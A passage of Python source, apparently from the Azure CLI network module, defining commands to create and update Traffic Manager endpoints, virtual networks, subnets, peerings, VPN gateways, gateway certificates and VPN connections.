instance.monitor_config.port = monitor_port
if monitor_path == '':
instance.monitor_config.path = None
elif monitor_path is not None:
instance.monitor_config.path = monitor_path
if interval is not None:
instance.monitor_config.interval_in_seconds = interval
if timeout is not None:
instance.monitor_config.timeout_in_seconds = timeout
if max_failures is not None:
instance.monitor_config.tolerated_number_of_failures = max_failures
if monitor_custom_headers is not None:
instance.monitor_config.custom_headers = monitor_custom_headers
if status_code_ranges is not None:
instance.monitor_config.expected_status_code_ranges = status_code_ranges
if max_return is not None:
instance.max_return = max_return
# TODO: Remove workaround after https://github.com/Azure/azure-rest-api-specs/issues/1940 fixed
for endpoint in instance.endpoints:
endpoint._validation = { # pylint: disable=protected-access
'name': {'readonly': False},
'type': {'readonly': False},
}
return instance
def create_traffic_manager_endpoint(cmd, resource_group_name, profile_name, endpoint_type, endpoint_name,
target_resource_id=None, target=None,
endpoint_status=None, weight=None, priority=None,
endpoint_location=None, endpoint_monitor_status=None,
min_child_endpoints=None, geo_mapping=None,
monitor_custom_headers=None, subnets=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
from azure.mgmt.trafficmanager.models import Endpoint
ncf = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).endpoints
endpoint = Endpoint(target_resource_id=target_resource_id, target=target,
endpoint_status=endpoint_status, weight=weight, priority=priority,
endpoint_location=endpoint_location,
endpoint_monitor_status=endpoint_monitor_status,
min_child_endpoints=min_child_endpoints,
geo_mapping=geo_mapping,
subnets=subnets,
custom_headers=monitor_custom_headers)
return ncf.create_or_update(resource_group_name, profile_name, endpoint_type, endpoint_name,
endpoint)
def update_traffic_manager_endpoint(instance, endpoint_type=None, endpoint_location=None,
endpoint_status=None, endpoint_monitor_status=None,
priority=None, target=None, target_resource_id=None,
weight=None, min_child_endpoints=None, geo_mapping=None,
subnets=None, monitor_custom_headers=None):
if endpoint_location is not None:
instance.endpoint_location = endpoint_location
if endpoint_status is not None:
instance.endpoint_status = endpoint_status
if endpoint_monitor_status is not None:
instance.endpoint_monitor_status = endpoint_monitor_status
if priority is not None:
instance.priority = priority
if target is not None:
instance.target = target
if target_resource_id is not None:
instance.target_resource_id = target_resource_id
if weight is not None:
instance.weight = weight
if min_child_endpoints is not None:
instance.min_child_endpoints = min_child_endpoints
if geo_mapping is not None:
instance.geo_mapping = geo_mapping
if subnets is not None:
instance.subnets = subnets
if monitor_custom_headers:
instance.custom_headers = monitor_custom_headers
return instance
def list_traffic_manager_endpoints(cmd, resource_group_name, profile_name, endpoint_type=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
profile = client.get(resource_group_name, profile_name)
return [e for e in profile.endpoints if not endpoint_type or e.type.endswith(endpoint_type)]
# endregion
# region VirtualNetworks
# pylint: disable=too-many-locals
def create_vnet(cmd, resource_group_name, vnet_name, vnet_prefixes='10.0.0.0/16',
subnet_name=None, subnet_prefix=None, dns_servers=None,
location=None, tags=None, vm_protection=None, ddos_protection=None, bgp_community=None,
ddos_protection_plan=None, network_security_group=None, edge_zone=None, flowtimeout=None,
enable_encryption=None, encryption_enforcement_policy=None):
AddressSpace, DhcpOptions, Subnet, VirtualNetwork, SubResource, NetworkSecurityGroup = \
cmd.get_models('AddressSpace', 'DhcpOptions', 'Subnet', 'VirtualNetwork',
'SubResource', 'NetworkSecurityGroup')
client = network_client_factory(cmd.cli_ctx).virtual_networks
tags = tags or {}
vnet = VirtualNetwork(
location=location, tags=tags,
dhcp_options=DhcpOptions(dns_servers=dns_servers),
address_space=AddressSpace(address_prefixes=(vnet_prefixes if isinstance(vnet_prefixes, list) else [vnet_prefixes]))) # pylint: disable=line-too-long
if subnet_name:
if cmd.supported_api_version(min_api='2018-08-01'):
vnet.subnets = [Subnet(name=subnet_name,
address_prefix=subnet_prefix[0] if len(subnet_prefix) == 1 else None,
address_prefixes=subnet_prefix if len(subnet_prefix) > 1 else None,
network_security_group=NetworkSecurityGroup(id=network_security_group)
if network_security_group else None)]
else:
vnet.subnets = [Subnet(name=subnet_name, address_prefix=subnet_prefix)]
if cmd.supported_api_version(min_api='2017-09-01'):
vnet.enable_ddos_protection = ddos_protection
vnet.enable_vm_protection = vm_protection
if cmd.supported_api_version(min_api='2018-02-01'):
vnet.ddos_protection_plan = SubResource(id=ddos_protection_plan) if ddos_protection_plan else None
if edge_zone:
vnet.extended_location = _edge_zone_model(cmd, edge_zone)
if flowtimeout is not None:
vnet.flow_timeout_in_minutes = flowtimeout
if bgp_community is not None and cmd.supported_api_version(min_api='2020-06-01'):
VirtualNetworkBgpCommunities = cmd.get_models('VirtualNetworkBgpCommunities')
vnet.bgp_communities = VirtualNetworkBgpCommunities(virtual_network_community=bgp_community)
if enable_encryption is not None:
if not vnet.encryption:
vnet.encryption = {}
vnet.encryption["enabled"] = enable_encryption
if encryption_enforcement_policy is not None:
if not vnet.encryption:
raise ArgumentUsageError('usage error: --encryption--enforcement--policy is only configurable when '
'--enable-encryption is specified.')
vnet.encryption["enforcement"] = encryption_enforcement_policy
return cached_put(cmd, client.begin_create_or_update, vnet, resource_group_name, vnet_name)
def update_vnet(cmd, instance, vnet_prefixes=None, dns_servers=None, ddos_protection=None, vm_protection=None,
ddos_protection_plan=None, flowtimeout=None, bgp_community=None, enable_encryption=None,
encryption_enforcement_policy=None):
# server side validation reports pretty good error message on invalid CIDR,
# so we don't validate at client side
AddressSpace, DhcpOptions, SubResource = cmd.get_models('AddressSpace', 'DhcpOptions', 'SubResource')
if vnet_prefixes and instance.address_space:
instance.address_space.address_prefixes = vnet_prefixes
elif vnet_prefixes:
instance.address_space = AddressSpace(address_prefixes=vnet_prefixes)
if dns_servers == ['']:
instance.dhcp_options.dns_servers = None
elif dns_servers and instance.dhcp_options:
instance.dhcp_options.dns_servers = dns_servers
elif dns_servers:
instance.dhcp_options = DhcpOptions(dns_servers=dns_servers)
if ddos_protection is not None:
instance.enable_ddos_protection = ddos_protection
if vm_protection is not None:
instance.enable_vm_protection = vm_protection
if ddos_protection_plan == '':
instance.ddos_protection_plan = None
elif ddos_protection_plan is not None:
instance.ddos_protection_plan = SubResource(id=ddos_protection_plan)
if flowtimeout is not None:
instance.flow_timeout_in_minutes = flowtimeout
if bgp_community is not None and cmd.supported_api_version(min_api='2020-06-01'):
VirtualNetworkBgpCommunities = cmd.get_models('VirtualNetworkBgpCommunities')
instance.bgp_communities = VirtualNetworkBgpCommunities(virtual_network_community=bgp_community)
if enable_encryption is not None:
if not instance.encryption:
VirtualNetworkEncryption = cmd.get_models('VirtualNetworkEncryption')
instance.encryption = VirtualNetworkEncryption(enabled=enable_encryption)
instance.encryption.enabled = enable_encryption
if encryption_enforcement_policy is not None:
if not instance.encryption:
raise ArgumentUsageError('usage error: --encryption--enforcement--policy is only configurable when '
'--enable-encryption is specified.')
instance.encryption.enforcement = encryption_enforcement_policy
return instance
def _set_route_table(ncf, resource_group_name, route_table, subnet):
if route_table:
is_id = is_valid_resource_id(route_table)
rt = None
if is_id:
res_id = parse_resource_id(route_table)
rt = ncf.route_tables.get(res_id['resource_group'], res_id['name'])
else:
rt = ncf.route_tables.get(resource_group_name, route_table)
subnet.route_table = rt
elif route_table == '':
subnet.route_table = None
def create_subnet(cmd, resource_group_name, virtual_network_name, subnet_name,
address_prefix, network_security_group=None,
route_table=None, service_endpoints=None, service_endpoint_policy=None,
delegations=None, nat_gateway=None,
disable_private_endpoint_network_policies=None,
disable_private_link_service_network_policies=None):
NetworkSecurityGroup, ServiceEndpoint, Subnet, SubResource = cmd.get_models(
'NetworkSecurityGroup', 'ServiceEndpointPropertiesFormat', 'Subnet', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
if cmd.supported_api_version(min_api='2018-08-01'):
subnet = Subnet(
name=subnet_name,
address_prefixes=address_prefix if len(address_prefix) > 1 else None,
address_prefix=address_prefix[0] if len(address_prefix) == 1 else None
)
if cmd.supported_api_version(min_api='2019-02-01') and nat_gateway:
subnet.nat_gateway = SubResource(id=nat_gateway)
else:
subnet = Subnet(name=subnet_name, address_prefix=address_prefix)
if network_security_group:
subnet.network_security_group = NetworkSecurityGroup(id=network_security_group)
_set_route_table(ncf, resource_group_name, route_table, subnet)
if service_endpoints:
subnet.service_endpoints = []
for service in service_endpoints:
subnet.service_endpoints.append(ServiceEndpoint(service=service))
if service_endpoint_policy:
subnet.service_endpoint_policies = []
for policy in service_endpoint_policy:
subnet.service_endpoint_policies.append(SubResource(id=policy))
if delegations:
subnet.delegations = delegations
if disable_private_endpoint_network_policies is True:
subnet.private_endpoint_network_policies = "Disabled"
if disable_private_endpoint_network_policies is False:
subnet.private_endpoint_network_policies = "Enabled"
if disable_private_link_service_network_policies is True:
subnet.private_link_service_network_policies = "Disabled"
if disable_private_link_service_network_policies is False:
subnet.private_link_service_network_policies = "Enabled"
vnet = cached_get(cmd, ncf.virtual_networks.get, resource_group_name, virtual_network_name)
upsert_to_collection(vnet, 'subnets', subnet, 'name')
vnet = cached_put(
cmd, ncf.virtual_networks.begin_create_or_update, vnet, resource_group_name, virtual_network_name).result()
return get_property(vnet.subnets, subnet_name)
def update_subnet(cmd, instance, resource_group_name, address_prefix=None, network_security_group=None,
route_table=None, service_endpoints=None, delegations=None, nat_gateway=None,
service_endpoint_policy=None, disable_private_endpoint_network_policies=None,
disable_private_link_service_network_policies=None):
NetworkSecurityGroup, ServiceEndpoint, SubResource = cmd.get_models(
'NetworkSecurityGroup', 'ServiceEndpointPropertiesFormat', 'SubResource')
if address_prefix:
if cmd.supported_api_version(min_api='2018-08-01'):
instance.address_prefixes = address_prefix if len(address_prefix) > 1 else None
instance.address_prefix = address_prefix[0] if len(address_prefix) == 1 else None
else:
instance.address_prefix = address_prefix
if cmd.supported_api_version(min_api='2019-02-01') and nat_gateway:
instance.nat_gateway = SubResource(id=nat_gateway)
elif nat_gateway == '':
instance.nat_gateway = None
if network_security_group:
instance.network_security_group = NetworkSecurityGroup(id=network_security_group)
elif network_security_group == '': # clear it
instance.network_security_group = None
_set_route_table(network_client_factory(cmd.cli_ctx), resource_group_name, route_table, instance)
if service_endpoints == ['']:
instance.service_endpoints = None
elif service_endpoints:
instance.service_endpoints = []
for service in service_endpoints:
instance.service_endpoints.append(ServiceEndpoint(service=service))
if service_endpoint_policy == '':
instance.service_endpoint_policies = None
elif service_endpoint_policy:
instance.service_endpoint_policies = []
for policy in service_endpoint_policy:
instance.service_endpoint_policies.append(SubResource(id=policy))
if delegations:
instance.delegations = delegations
if disable_private_endpoint_network_policies:
instance.private_endpoint_network_policies = "Disabled"
elif disable_private_endpoint_network_policies is not None:
instance.private_endpoint_network_policies = "Enabled"
if disable_private_link_service_network_policies:
instance.private_link_service_network_policies = "Disabled"
elif disable_private_link_service_network_policies is not None:
instance.private_link_service_network_policies = "Enabled"
return instance
def list_avail_subnet_delegations(cmd, resource_group_name=None, location=None):
client = network_client_factory(cmd.cli_ctx)
if resource_group_name:
return client.available_resource_group_delegations.list(location, resource_group_name)
return client.available_delegations.list(location)
def create_vnet_peering(cmd, resource_group_name, virtual_network_name, virtual_network_peering_name,
remote_virtual_network, allow_virtual_network_access=False,
allow_forwarded_traffic=False, allow_gateway_transit=False,
use_remote_gateways=False):
if not is_valid_resource_id(remote_virtual_network):
remote_virtual_network = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=remote_virtual_network
)
SubResource, VirtualNetworkPeering = cmd.get_models('SubResource', 'VirtualNetworkPeering')
peering = VirtualNetworkPeering(
id=resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=virtual_network_name),
name=virtual_network_peering_name,
remote_virtual_network=SubResource(id=remote_virtual_network),
allow_virtual_network_access=allow_virtual_network_access,
allow_gateway_transit=allow_gateway_transit,
allow_forwarded_traffic=allow_forwarded_traffic,
use_remote_gateways=use_remote_gateways)
aux_subscription = parse_resource_id(remote_virtual_network)['subscription']
ncf = network_client_factory(cmd.cli_ctx, aux_subscriptions=[aux_subscription])
return ncf.virtual_network_peerings.begin_create_or_update(
resource_group_name, virtual_network_name, virtual_network_peering_name, peering)
def update_vnet_peering(cmd, resource_group_name, virtual_network_name, virtual_network_peering_name, **kwargs):
peering = kwargs['parameters']
aux_subscription = parse_resource_id(peering.remote_virtual_network.id)['subscription']
ncf = network_client_factory(cmd.cli_ctx, aux_subscriptions=[aux_subscription])
return ncf.virtual_network_peerings.begin_create_or_update(
resource_group_name, virtual_network_name, virtual_network_peering_name, peering)
def list_available_ips(cmd, resource_group_name, virtual_network_name):
client = network_client_factory(cmd.cli_ctx).virtual_networks
vnet = client.get(resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name)
start_ip = vnet.address_space.address_prefixes[0].split('/')[0]
available_ips = client.check_ip_address_availability(resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
ip_address=start_ip)
return available_ips.available_ip_addresses
# endregion
# region VirtualNetworkGateways
def create_vnet_gateway_root_cert(cmd, resource_group_name, gateway_name, public_cert_data, cert_name):
VpnClientRootCertificate = cmd.get_models('VpnClientRootCertificate')
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if not gateway.vpn_client_configuration:
raise CLIError("Must add address prefixes to gateway '{}' prior to adding a root cert."
.format(gateway_name))
config = gateway.vpn_client_configuration
if config.vpn_client_root_certificates is None:
config.vpn_client_root_certificates = []
cert = VpnClientRootCertificate(name=cert_name, public_cert_data=public_cert_data)
upsert_to_collection(config, 'vpn_client_root_certificates', cert, 'name')
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def delete_vnet_gateway_root_cert(cmd, resource_group_name, gateway_name, cert_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
config = gateway.vpn_client_configuration
try:
cert = next(c for c in config.vpn_client_root_certificates if c.name == cert_name)
except (AttributeError, StopIteration):
raise CLIError('Certificate "{}" not found in gateway "{}"'.format(cert_name, gateway_name))
config.vpn_client_root_certificates.remove(cert)
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def create_vnet_gateway_revoked_cert(cmd, resource_group_name, gateway_name, thumbprint, cert_name):
VpnClientRevokedCertificate = cmd.get_models('VpnClientRevokedCertificate')
config, gateway, ncf = _prep_cert_create(cmd, gateway_name, resource_group_name)
cert = VpnClientRevokedCertificate(name=cert_name, thumbprint=thumbprint)
upsert_to_collection(config, 'vpn_client_revoked_certificates', cert, 'name')
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def delete_vnet_gateway_revoked_cert(cmd, resource_group_name, gateway_name, cert_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
config = gateway.vpn_client_configuration
try:
cert = next(c for c in config.vpn_client_revoked_certificates if c.name == cert_name)
except (AttributeError, StopIteration):
raise CLIError('Certificate "{}" not found in gateway "{}"'.format(cert_name, gateway_name))
config.vpn_client_revoked_certificates.remove(cert)
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def _prep_cert_create(cmd, gateway_name, resource_group_name):
VpnClientConfiguration = cmd.get_models('VpnClientConfiguration')
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if not gateway.vpn_client_configuration:
gateway.vpn_client_configuration = VpnClientConfiguration()
config = gateway.vpn_client_configuration
if not config.vpn_client_address_pool or not config.vpn_client_address_pool.address_prefixes:
raise CLIError('Address prefixes must be set on VPN gateways before adding'
' certificates. Please use "update" with --address-prefixes first.')
if config.vpn_client_revoked_certificates is None:
config.vpn_client_revoked_certificates = []
if config.vpn_client_root_certificates is None:
config.vpn_client_root_certificates = []
return config, gateway, ncf
def create_vnet_gateway(cmd, resource_group_name, virtual_network_gateway_name, public_ip_address,
virtual_network, location=None, tags=None,
no_wait=False, gateway_type=None, sku=None, vpn_type=None, vpn_gateway_generation=None,
asn=None, bgp_peering_address=None, peer_weight=None,
address_prefixes=None, radius_server=None, radius_secret=None, client_protocol=None,
gateway_default_site=None, custom_routes=None, aad_tenant=None, aad_audience=None,
aad_issuer=None, root_cert_data=None, root_cert_name=None, vpn_auth_type=None, edge_zone=None,
nat_rule=None):
(VirtualNetworkGateway, BgpSettings, SubResource, VirtualNetworkGatewayIPConfiguration, VirtualNetworkGatewaySku,
VpnClientConfiguration, AddressSpace, VpnClientRootCertificate, VirtualNetworkGatewayNatRule,
VpnNatRuleMapping) = cmd.get_models(
'VirtualNetworkGateway', 'BgpSettings', 'SubResource', 'VirtualNetworkGatewayIPConfiguration',
'VirtualNetworkGatewaySku', 'VpnClientConfiguration', 'AddressSpace', 'VpnClientRootCertificate',
'VirtualNetworkGatewayNatRule', 'VpnNatRuleMapping')
client = network_client_factory(cmd.cli_ctx).virtual_network_gateways
subnet = virtual_network + '/subnets/GatewaySubnet'
active = len(public_ip_address) == 2
vnet_gateway = VirtualNetworkGateway(
gateway_type=gateway_type, vpn_type=vpn_type, vpn_gateway_generation=vpn_gateway_generation, location=location,
tags=tags, sku=VirtualNetworkGatewaySku(name=sku, tier=sku), active=active, ip_configurations=[],
gateway_default_site=SubResource(id=gateway_default_site) if gateway_default_site else None)
for i, public_ip in enumerate(public_ip_address):
ip_configuration = VirtualNetworkGatewayIPConfiguration(
subnet=SubResource(id=subnet),
public_ip_address=SubResource(id=public_ip),
private_ip_allocation_method='Dynamic',
name='vnetGatewayConfig{}'.format(i)
)
vnet_gateway.ip_configurations.append(ip_configuration)
if asn or bgp_peering_address or peer_weight:
vnet_gateway.enable_bgp = True
vnet_gateway.bgp_settings = BgpSettings(asn=asn, bgp_peering_address=bgp_peering_address,
peer_weight=peer_weight)
if any((address_prefixes, client_protocol)):
vnet_gateway.vpn_client_configuration = VpnClientConfiguration()
vnet_gateway.vpn_client_configuration.vpn_client_address_pool = AddressSpace()
vnet_gateway.vpn_client_configuration.vpn_client_address_pool.address_prefixes = address_prefixes
vnet_gateway.vpn_client_configuration.vpn_client_protocols = client_protocol
if any((radius_secret, radius_server)) and cmd.supported_api_version(min_api='2017-06-01'):
vnet_gateway.vpn_client_configuration.radius_server_address = radius_server
vnet_gateway.vpn_client_configuration.radius_server_secret = radius_secret
# multi authentication
if cmd.supported_api_version(min_api='2020-11-01'):
vnet_gateway.vpn_client_configuration.vpn_authentication_types = vpn_auth_type
vnet_gateway.vpn_client_configuration.aad_tenant = aad_tenant
vnet_gateway.vpn_client_configuration.aad_issuer = aad_issuer
vnet_gateway.vpn_client_configuration.aad_audience = aad_audience
vnet_gateway.vpn_client_configuration.vpn_client_root_certificates = [
VpnClientRootCertificate(name=root_cert_name,
public_cert_data=root_cert_data)] if root_cert_data else None
if custom_routes and cmd.supported_api_version(min_api='2019-02-01'):
vnet_gateway.custom_routes = AddressSpace()
vnet_gateway.custom_routes.address_prefixes = custom_routes
if edge_zone:
vnet_gateway.extended_location = _edge_zone_model(cmd, edge_zone)
if nat_rule:
vnet_gateway.nat_rules = [
VirtualNetworkGatewayNatRule(type_properties_type=rule.get('type'), mode=rule.get('mode'), name=rule.get('name'),
internal_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in rule.get('internal_mappings')] if rule.get('internal_mappings') else None,
external_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in rule.get('external_mappings')] if rule.get('external_mappings') else None,
ip_configuration_id=rule.get('ip_config_id')) for rule in nat_rule]
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, virtual_network_gateway_name, vnet_gateway)
def update_vnet_gateway(cmd, instance, sku=None, vpn_type=None, tags=None,
public_ip_address=None, gateway_type=None, enable_bgp=None,
asn=None, bgp_peering_address=None, peer_weight=None, virtual_network=None,
address_prefixes=None, radius_server=None, radius_secret=None, client_protocol=None,
gateway_default_site=None, custom_routes=None, aad_tenant=None, aad_audience=None,
aad_issuer=None, root_cert_data=None, root_cert_name=None, vpn_auth_type=None):
(AddressSpace, SubResource, VirtualNetworkGatewayIPConfiguration, VpnClientConfiguration,
VpnClientRootCertificate) = cmd.get_models('AddressSpace', 'SubResource', 'VirtualNetworkGatewayIPConfiguration',
'VpnClientConfiguration', 'VpnClientRootCertificate')
if any((address_prefixes, radius_server, radius_secret, client_protocol)) and not instance.vpn_client_configuration:
instance.vpn_client_configuration = VpnClientConfiguration()
if address_prefixes is not None:
if not instance.vpn_client_configuration.vpn_client_address_pool:
instance.vpn_client_configuration.vpn_client_address_pool = AddressSpace()
if not instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes:
instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes = []
instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes = address_prefixes
with cmd.update_context(instance.vpn_client_configuration) as c:
c.set_param('vpn_client_protocols', client_protocol)
c.set_param('radius_server_address', radius_server)
c.set_param('radius_server_secret', radius_secret)
if cmd.supported_api_version(min_api='2020-11-01'):
c.set_param('aad_tenant', aad_tenant)
c.set_param('aad_audience', aad_audience)
c.set_param('aad_issuer', aad_issuer)
c.set_param('vpn_authentication_types', vpn_auth_type)
if root_cert_data and cmd.supported_api_version(min_api='2020-11-01'):
upsert_to_collection(instance.vpn_client_configuration, 'vpn_client_root_certificates',
VpnClientRootCertificate(name=root_cert_name, public_cert_data=root_cert_data), 'name')
with cmd.update_context(instance.sku) as c:
c.set_param('name', sku)
c.set_param('tier', sku)
with cmd.update_context(instance) as c:
c.set_param('gateway_default_site', SubResource(id=gateway_default_site) if gateway_default_site else None)
c.set_param('vpn_type', vpn_type)
c.set_param('tags', tags)
subnet_id = '{}/subnets/GatewaySubnet'.format(virtual_network) if virtual_network else \
instance.ip_configurations[0].subnet.id
if virtual_network is not None:
for config in instance.ip_configurations:
config.subnet.id = subnet_id
if public_ip_address is not None:
instance.ip_configurations = []
for i, public_ip in enumerate(public_ip_address):
ip_configuration = VirtualNetworkGatewayIPConfiguration(
subnet=SubResource(id=subnet_id),
public_ip_address=SubResource(id=public_ip),
private_ip_allocation_method='Dynamic', name='vnetGatewayConfig{}'.format(i))
instance.ip_configurations.append(ip_configuration)
# Update active-active/active-standby status
active = len(public_ip_address) == 2
if instance.active and not active:
logger.info('Placing gateway in active-standby mode.')
elif not instance.active and active:
logger.info('Placing gateway in active-active mode.')
instance.active = active
if gateway_type is not None:
instance.gateway_type = gateway_type
if enable_bgp is not None:
instance.enable_bgp = enable_bgp.lower() == 'true'
if custom_routes and cmd.supported_api_version(min_api='2019-02-01'):
if not instance.custom_routes:
instance.custom_routes = AddressSpace()
instance.custom_routes.address_prefixes = custom_routes
_validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight)
return instance
def start_vnet_gateway_package_capture(cmd, client, resource_group_name, virtual_network_gateway_name,
filter_data=None, no_wait=False):
VpnPacketCaptureStartParameters = cmd.get_models('VpnPacketCaptureStartParameters')
parameters = VpnPacketCaptureStartParameters(filter_data=filter_data)
return sdk_no_wait(no_wait, client.begin_start_packet_capture, resource_group_name,
virtual_network_gateway_name, parameters=parameters)
def stop_vnet_gateway_package_capture(cmd, client, resource_group_name, virtual_network_gateway_name,
sas_url, no_wait=False):
VpnPacketCaptureStopParameters = cmd.get_models('VpnPacketCaptureStopParameters')
parameters = VpnPacketCaptureStopParameters(sas_url=sas_url)
return sdk_no_wait(no_wait, client.begin_stop_packet_capture, resource_group_name,
virtual_network_gateway_name, parameters=parameters)
def generate_vpn_client(cmd, client, resource_group_name, virtual_network_gateway_name, processor_architecture=None,
authentication_method=None, radius_server_auth_certificate=None, client_root_certificates=None,
use_legacy=False):
params = cmd.get_models('VpnClientParameters')(
processor_architecture=processor_architecture
)
if cmd.supported_api_version(min_api='2017-06-01') and not use_legacy:
params.authentication_method = authentication_method
params.radius_server_auth_certificate = radius_server_auth_certificate
params.client_root_certificates = client_root_certificates
return client.begin_generate_vpn_profile(resource_group_name, virtual_network_gateway_name, params)
# legacy implementation
return client.begin_generatevpnclientpackage(resource_group_name, virtual_network_gateway_name, params)
def set_vpn_client_ipsec_policy(cmd, client, resource_group_name, virtual_network_gateway_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
VpnClientIPsecParameters = cmd.get_models('VpnClientIPsecParameters')
vpnclient_ipsec_params = VpnClientIPsecParameters(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
return sdk_no_wait(no_wait, client.begin_set_vpnclient_ipsec_parameters, resource_group_name,
virtual_network_gateway_name, vpnclient_ipsec_params)
def disconnect_vnet_gateway_vpn_connections(cmd, client, resource_group_name, virtual_network_gateway_name,
vpn_connection_ids, no_wait=False):
P2SVpnConnectionRequest = cmd.get_models('P2SVpnConnectionRequest')
request = P2SVpnConnectionRequest(vpn_connection_ids=vpn_connection_ids)
return sdk_no_wait(no_wait, client.begin_disconnect_virtual_network_gateway_vpn_connections,
resource_group_name, virtual_network_gateway_name, request)
# endregion
# region VirtualNetworkGatewayConnections
# pylint: disable=too-many-locals
def create_vpn_connection(cmd, resource_group_name, connection_name, vnet_gateway1,
location=None, tags=None, no_wait=False, validate=False,
vnet_gateway2=None, express_route_circuit2=None, local_gateway2=None,
authorization_key=None, enable_bgp=False, routing_weight=10,
connection_type=None, shared_key=None,
use_policy_based_traffic_selectors=False,
express_route_gateway_bypass=None, ingress_nat_rule=None, egress_nat_rule=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import build_vpn_connection_resource
client = network_client_factory(cmd.cli_ctx).virtual_network_gateway_connections
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
tags = tags or {}
# Build up the ARM template
master_template = ArmTemplateBuilder()
vpn_connection_resource = build_vpn_connection_resource(
cmd, connection_name, location, tags, vnet_gateway1,
vnet_gateway2 or local_gateway2 or express_route_circuit2,
connection_type, authorization_key, enable_bgp, routing_weight, shared_key,
use_policy_based_traffic_selectors, express_route_gateway_bypass, ingress_nat_rule, egress_nat_rule)
master_template.add_resource(vpn_connection_resource)
master_template.add_output('resource', connection_name, output_type='object')
if shared_key:
master_template.add_secure_parameter('sharedKey', shared_key)
if authorization_key:
master_template.add_secure_parameter('authorizationKey', authorization_key)
template = master_template.build()
parameters = master_template.build_parameters()
# deploy ARM template
deployment_name = 'vpn_connection_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def update_vpn_connection(cmd, instance, routing_weight=None, shared_key=None, tags=None,
enable_bgp=None, use_policy_based_traffic_selectors=None,
express_route_gateway_bypass=None):
with cmd.update_context(instance) as c:
c.set_param('routing_weight', routing_weight)
c.set_param('shared_key', shared_key)
c.set_param('tags', tags)
c.set_param('enable_bgp', enable_bgp)
c.set_param('express_route_gateway_bypass', express_route_gateway_bypass)
c.set_param('use_policy_based_traffic_selectors', use_policy_based_traffic_selectors)
# TODO: Remove these when issue #1615 is fixed
gateway1_id = parse_resource_id(instance.virtual_network_gateway1.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway1_id['subscription'])
instance.virtual_network_gateway1 = ncf.virtual_network_gateways.get(
gateway1_id['resource_group'], gateway1_id['name'])
if instance.virtual_network_gateway2:
gateway2_id = parse_resource_id(instance.virtual_network_gateway2.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway2_id['subscription'])
instance.virtual_network_gateway2 = ncf.virtual_network_gateways.get(
gateway2_id['resource_group'], gateway2_id['name'])
if instance.local_network_gateway2:
gateway2_id = parse_resource_id(instance.local_network_gateway2.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway2_id['subscription'])
instance.local_network_gateway2 = ncf.local_network_gateways.get(
gateway2_id['resource_group'], gateway2_id['name'])
return instance
def list_vpn_connections(cmd, resource_group_name, virtual_network_gateway_name=None):
if virtual_network_gateway_name:
client = network_client_factory(cmd.cli_ctx).virtual_network_gateways
return client.list_connections(resource_group_name, virtual_network_gateway_name)
client = network_client_factory(cmd.cli_ctx).virtual_network_gateway_connections
return client.list(resource_group_name)
def start_vpn_conn_package_capture(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
filter_data=None, no_wait=False):
VpnPacketCaptureStartParameters = cmd.get_models('VpnPacketCaptureStartParameters')
parameters = VpnPacketCaptureStartParameters(filter_data=filter_data)
return sdk_no_wait(no_wait, client.begin_start_packet_capture, resource_group_name,
virtual_network_gateway_connection_name, parameters=parameters)
def stop_vpn_conn_package_capture(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
sas_url, no_wait=False):
